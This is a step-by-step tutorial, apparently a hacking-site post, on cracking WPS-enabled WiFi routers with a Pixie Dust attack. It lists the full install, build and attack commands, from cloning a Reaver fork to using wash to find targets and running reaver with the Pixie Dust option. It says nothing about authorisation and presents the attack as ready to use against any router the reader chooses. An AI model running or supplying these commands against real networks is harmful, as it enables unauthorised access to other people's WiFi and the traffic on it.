How to Hack WiFi Using a WPS Pixie Dust Attack

Long time reader, first time 'How To' poster. This tutorial has been highly requested. Here are the steps to perform a Pixie Dust attack to crack a WiFi password that has WPS enabled.

Please note, this attack is very specific in nature. I've had a lot of success running this attack against Ralink and RealTek chipsets. And very spotty success against Broadcom chipsets. This might not work against all routers, but is definitely worth trying before using a brute force attack against WPS

Let's Begin!!!

Step 1: Download All Dependencies

It's important to download all dependencies from the repository before proceeding with the attack. Kali Linux includes some of these, but if you're using another flavor of Linux, it may not. So let's go through all of them.

1. First, type into the terminal: apt-get update
2. Then: apt-get install build-essential
3. apt-get install libpcap-dev
4. apt-get install sqlite3
5. apt-get install libsqlite3-dev
6. apt-get install pixiewps

I like to do each download individually as I've had issues in the past trying to download all at once.

Step 2: Clone the GitHub

This attack works by using a fork of Reaver. We'll need to download, compile, and install the fork. Let's begin:

git clone https://github.com/t6x/reaver-wps-fork-t6x

Step 3: Installation

From your pwd, type...

1. cd reaver-wps-fork-t6x/
2. cd src/
3. ./configure
4. make
5. make install

or 'sudo make install' if you're not logged in as 'root'

Step 4: Monitor Mode

Put your interface into monitor mode using 'airmon-ng start {wireless interface}

Check out our list of Kali compatible wireless networks.

For this to work, we'll need to use a compatible wireless network adapter. Check out our 2017 list of Kali Linux and Backtrack compatible wireless network adapters in the link above, or you can grab our most popular adapter for beginners here.

Step 5: Find a Target

The easiest way to find a target with WPS enabled is

'wash -i {monitor-interface}'

Gather the BSSID and channel # for the router you want to attack. Make sure you have a strong signal before attempting this attack.

Step 6: Launch the Attack

Once you have all the information, simply type in the following command:

reaver -i {monitor interface} -b {BSSID of router} -c {router channel} -vvv -K 1 -f

Step 7: Ta-Da!

There's the password! Again, this attack won't work against all routers, but it is definitely more effective than a brute force attack (Pixie Dust: maximum 30 minutes vs Brute Force: minutes to DAYS!)

If you're looking for a cheap, handy platform to get started working with the pixie dust attack, check out our Kali Linux Raspberry Pi build using the $35 Raspberry Pi.

Get started on the Kali Pi.

That's all for now!